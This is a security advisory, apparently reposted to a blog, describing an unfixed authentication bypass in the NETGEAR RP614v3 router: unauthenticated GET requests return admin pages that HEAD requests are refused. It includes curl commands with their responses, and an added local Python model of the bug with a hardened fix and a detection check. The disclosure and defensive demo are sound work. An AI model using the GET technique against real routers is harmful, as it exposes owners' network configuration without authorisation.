###########################################
Vendor      : NETGEAR
Product     : RP614v3
informed on : 12. 10. 2015
responded   : no
fixed       : no
Effect      : Remotely exploitable over LAN/WLAN
Type        : Authentication Bypass
Difficulty  : trivial
###########################################

The N300 FW authentication bypass inspired me to check my RP614v3 router, and I found this bypass:

Firmware: *Firmwareversion* V6.0GR Oct 26 2004 (which seems to be the latest)

It's an old model, but it's still in operation with ADSL2 connections like TCOM DSL6000 in Germany.

How it works:

If you use a normal browser, it first sends a *HEAD* to the router, followed by a GET. The HEAD gets a 403 Forbidden back:

# curl -I "http://ift.tt/23LDsnp"
HTTP/1.0 403 Forbidden

This was expected and is the valid answer, but if you send a *GET* instead of the HEAD while you're not authenticated, you get a 200 back:

# curl -i "http://ift.tt/23LDsnp"
HTTP/1.0 200 OK
Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.
Content-length: 7158
Accept-ranges: bytes
Content-type: text/html
...

This works for every page, disclosing all the information the router has to offer. No password or username is needed.

Example:

# curl -i "http://ift.tt/1L0X7UM"
HTTP/1.0 200 OK
Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.
Content-length: 13722
Accept-ranges: bytes
Content-type: text/html
....

(All IPs and MACs have been changed.)

Sidenote: As it's a problem of the underlying httpd server from "Delta Networks Inc.", it is most likely affecting all DSL router products using that same version of the httpd.
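The following is an added example written for this post; it is not the router firmware or any Delta Networks code. The real cause inside Embedded HTTPD v1.00 is not known from the advisory, so the vulnerable handler below is an assumed model of the bug in which the credential check is wired into the HEAD handler only, which reproduces the observable symptom (HEAD gives 403, an unauthenticated GET on the same URL gives 200). The hardened handler applies the same credential check before every method. The probe function reproduces the two curl commands from the advisory against a loopback server, so the whole thing runs offline; the user name, password and page body are constructed for the demo.

```python
"""Local model of the HEAD/GET authentication inconsistency described in the
advisory (added example, not firmware code).  Run it and compare the two
servers: the vulnerable one answers HEAD with 403 but serves GET with 200."""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credentials and page for the demo; nothing from a real device.
DEMO_USER, DEMO_PASS = "admin", "demo-password"
PAGE = b"<html><body>router status page (constructed)</body></html>"


def _authorized(handler):
    """True if the request carries valid HTTP Basic credentials."""
    header = handler.headers.get("Authorization", "")
    if not header.startswith("Basic "):
        return False
    try:
        decoded = base64.b64decode(header[6:]).decode()
    except Exception:
        return False
    return decoded == f"{DEMO_USER}:{DEMO_PASS}"


class VulnerableHandler(BaseHTTPRequestHandler):
    """Assumed model of the bug: auth is enforced in do_HEAD only."""

    def log_message(self, *args):  # keep the demo output quiet
        pass

    def do_HEAD(self):
        if not _authorized(self):
            self.send_response(403)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()

    def do_GET(self):  # BUG: the page is served without any credential check
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.send_header("Content-length", str(len(PAGE)))
        self.end_headers()
        self.wfile.write(PAGE)


class HardenedHandler(VulnerableHandler):
    """Fix: the same gate runs before every method-specific handler."""

    def _deny(self):
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="router"')
        self.end_headers()

    def do_HEAD(self):
        if not _authorized(self):
            return self._deny()
        super().do_HEAD()

    def do_GET(self):
        if not _authorized(self):
            return self._deny()
        super().do_GET()


def serve(handler_cls):
    """Start handler_cls on an ephemeral loopback port; return (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def probe(port, path="/"):
    """Send an unauthenticated HEAD and GET (the advisory's two curl calls);
    return their status codes as (head_status, get_status)."""
    codes = []
    for method in ("HEAD", "GET"):
        conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
        conn.request(method, path)
        resp = conn.getresponse()
        resp.read()
        codes.append(resp.status)
        conn.close()
    return tuple(codes)


def method_bypass_suspected(head_status, get_status):
    """The advisory's signature: HEAD is refused, GET on the same URL is served."""
    return head_status in (401, 403) and get_status == 200


def run_demo():
    """Probe both handlers; return {name: (head, get, bypass_suspected)}."""
    results = {}
    for name, cls in (("vulnerable", VulnerableHandler), ("hardened", HardenedHandler)):
        server, port = serve(cls)
        try:
            head, get = probe(port, "/")
        finally:
            server.shutdown()
            server.server_close()
        results[name] = (head, get, method_bypass_suspected(head, get))
    return results


if __name__ == "__main__":
    for name, (head, get, flag) in run_demo().items():
        print(f"{name:10s} HEAD={head} GET={get} bypass_suspected={flag}")
```

The design point is the one the advisory implies: an access decision must not depend on the request method. Making the credential check a single gate that runs before dispatch, rather than something each method handler remembers to call, removes the class of bug where one verb is forgotten.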
Source: Gmail -> IFTTT-> Blogger